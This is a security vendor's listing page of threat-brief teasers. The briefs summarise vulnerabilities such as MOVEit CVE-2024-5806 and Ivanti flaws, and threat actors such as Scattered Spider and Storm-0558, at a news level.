Solutions
Solutions
Managed Detection & Response (MDR)
- Security Information & Event Management (SIEM)
- Network Detection & Response (NDR)
- Endpoint Detection & Response (EDR)
Advanced Threat Detection
Threat Hunting
Cyber Threat Intelligence (CTI)
Vulnerability Management
Use Cases
Security & Compliance Security Architecture Digital Risk Network Monitoring Email Security Cloud Security
Industries
Healthcare Legal Finance Manufacturing
ShieldVision™
ShieldVision is Lumifi’s proprietary technology. It is a singular, multi-tenant platform that increases interoperability between elements of the SOC visibility triad and enables clients to react to threats and breaches more effectively, resulting in fortified security environments and optimized business.
Explore the Platform.

Category: Threat Briefs

MOVEit Authentication Bypass (CVE-2024-5806)

Threat Summary: A vulnerability in MOVEit Transfer and MOVEit Gateway was announced on June 25th, 2024. The vulnerability impacts versions from 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, from 2024.0.0 before 2024.0.2. This vulnerability is classified as Improper Authentication (CWE-287) with a CVSS score of 9.1 (Critical). An attacker can arbitrarily authenticate into the MOVEit […]

ToddyCat is Making Holes in your Infrastructure

Kaspersky Labs published an article detailing activities they observed from ToddyCat, an APT threat actor targeting government and defense organizations in the Asia Pacific region. Kaspersky focused on the tools and techniques ToddyCat employed for traffic tunneling and data collection. Kaspersky observed ToddyCat dropping and configuring OpenSSH on compromised Windows hosts. A scheduled task was […]

Mitigating Risk: Understanding Vulnerabilities in the Ivanti Product Suite

In recent months, the Ivanti product suite has encountered several high-profile vulnerabilities, raising concerns within the cybersecurity community. Since the start of the calendar year, four critical vulnerabilities have been associated with Ivanti Connect Secure, Policy Secure, and Neurons. While the vendor has diligently addressed each vulnerability and deployed mitigations, the recurrence of vulnerabilities within […]

Scattered Spider, Oktapus, UNC3944, Scatter Swine – MGM Resorts Compromise

Threat Summary: On September 11th, 2023, MGM Resorts suffered a crippling ransomware attack that resulted in 10 days of computer system downtime as well as an estimated overall loss of $80,000,000. The threat actor, dubbed Scattered Spider, is claiming ownership of this hack and alleges to have ties with the infamous ALPHV/BlackCat ransomware gang. In […]

Flax Typhoon APT

Threat Summary:Flax Typhoon is a suspected China-based, nation-state threat actor whose TTPs appear to be closely aligned with espionage objectives and extended persistence. Despite activity tracing back to mid-2021, this APT's final objectives are unknown and they have been observed mostly targeting government, education, and critical manufacturing organizations in Taiwan; Though a small subset of […]

Ivanti/MobileIron Sentry Authentication Bypass Vulnerability (CVE-2023-38035)

CVE-2023-38035 Threat Summary: CVE-2023-38035 allows an unauthenticated attacker to access sensitive admin configuration APIs on versions 9.18 and prior of Ivanti Sentry over port 8443. These configuration APIs are then used by the MobileIron Configuration Service (MICS), which upon successful exploitation, could lead to remote code execution with root permissions and configuration changes to MICS. […]

Storm-0558 Unleashes Authentication Token Forgery

Threat Summary: Storm-0558 is suspected to be a China-based, nation-state threat actor whose TTPs are closely aligned with espionage objectives. This threat actor managed to compromise an inactive MSA signing key which was then used to sign fabricated authentication tokens. Authentication tokens are short-lived credentials that are used to authenticate users to a service. They […]

Update on PrintNightmare & Kaseya Ransomware

Over the 4th of July weekend, two breaches were brought to Lumifi's attention pertaining to PrintNightmare and Kaseya. Details on PrintNightmare While you likely do not have Print Servers exposed to the world (we hope not), we also wanted to note that we are aware of this and have diligently reviewed detection methodology. POC code […]

F5 BIG-IP Vulnerabilities

Twelve days ago, F5 announced several security vulnerabilities that went primarily overshadowed by the Exchange/Hafnium situation. It's important to understand that some of these are critical, remote command execution-level vulnerabilities that require nothing more than an attacker to connect to an F5 BIG-IP device. For those devices, being positioned "in front of" web server clusters […]

📣 New Webinar Alert!

🗓️ Date: Oct. 30th, 2024
🕒 Time: 11 AM (PT)

Secure Your Spot!

1475 N Scottsdale Rd STE 410
Scottsdale, AZ 85257

Solutions

Managed Detection & Response
Security Information & Event Management (SIEM)
Network Detection & Response (NDR)
Endpoint Detection & Response (EDR)
Advanced Threat Detection
Threat Hunting
Vulnerability Management
Cyber Threat Intelligence (CTI)

Use cases

Security & Compliance
Security Architecture
Network Monitoring Email Security
Digital Risk
Cloud Security

Visibility Triad
ShieldVision™

ShieldVision is Lumifi’s proprietary technology. It is a singular, multi-tenant platform that increases interoperability between elements of the SOC visibility triad and enables clients to react to threats and breaches more effectively, resulting in fortified security environments and optimized business. Explore the Platform.